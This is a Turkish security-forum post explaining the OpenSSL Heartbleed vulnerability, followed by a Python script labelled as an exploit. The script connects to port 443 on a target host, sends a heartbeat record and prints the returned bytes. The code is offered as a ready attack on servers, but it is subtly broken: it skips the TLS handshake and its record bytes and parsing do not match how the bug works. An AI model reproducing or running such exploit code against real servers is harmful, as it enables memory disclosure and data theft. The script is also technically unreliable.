You need to enable JavaScript to run this app.

Skip to main content

Heartbleed Açığı: OpenSSL Güvenlik Zafiyeti

Heartbleed Açığı: OpenSSL Güvenlik Zafiyeti

Junior Member
Heartbleed Açığı: OpenSSL Güvenlik Zafiyeti
Heartbleed Açığı Nedir?
Heartbleed, OpenSSL kütüphanesindeki bir güvenlik açığıdır ve 2014 yılında keşfedilmiştir. Bu açık, SSL/TLS protokollerindeki OpenSSL sürümlerindeki bir hata nedeniyle ortaya çıkmıştır. Heartbleed açığı, sunucudan gelen veri taleplerinin yanıtlarında bellek sızıntısına neden olur ve hassas bilgilerin ifşa edilmesine olanak tanır.

Heartbleed Açığı Nasıl İşler?

Heartbleed açığı, OpenSSL sürümünde bir hata olduğunda ortaya çıkar. İstemci, genellikle bir web tarayıcısı, sunucuya bir SSL/TLS bağlantısı talep eder. Sunucu, bu talebi karşılar ve bilgi gönderir. Ancak, bu aşamada açığın varlığından dolayı sunucu, istemciden gelen talepten daha fazla bellek verisini geri gönderebilir, hatta hassas verileri bile.

Örnek Python Kodları



Kod:
import socket
import struct

def heartbleed_exploit(target_host):
    # Socket oluştur
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect((target_host, 443))

    # Heartbeat talebi oluştur
    heartbeat = b'\x18\x03\x02\x00\x03\x01@\x00'
   
    # Sunucuya heartbeat talebini gönder
    client.send(heartbeat)
   
    # Sunucudan gelen yanıtı al
    data = client.recv(1024)
   
    # Yanıttan veri çıkart
    length = struct.unpack('!B', data[3:4])[0]
    payload = data[5:5+length]

    # Veriyi ekrana yazdır
    print("Heartbleed'den dönen veri: ", payload)

    # Soketi kapat
    client.close()

# Kullanım
if __name__ == '__main__':
    target_host = 'hedef_sunucu_adresi'
    heartbleed_exploit(target_host)

+++++
Ve ben sadece maske ardında yaşayan bir adamım
Son Düzenleme: 02-17-2024, 22:50, Düzenleyen: LASİODORA.

İçerik sağlayıcı paylaşım sitesi olarak hizmet veren Siber Güvenlik Forumu sitemizde 5651 sayılı kanunun 8. maddesine ve T.C.K'nın 125. maddesine göre tüm üyelerimiz yaptıkları paylaşımlardan kendileri sorumludur. Sitemiz hakkında yapılacak tüm hukuksal şikayetleri İletişim bağlantısından bize ulaşıldıktan en geç 3 (üç) gün içerisinde ilgili kanunlar ve yönetmenlikler çerçevesinde tarafımızca incelenerek, gereken işlemler yapılacak ve site yöneticilerimiz tarafından bilgi verilecektir.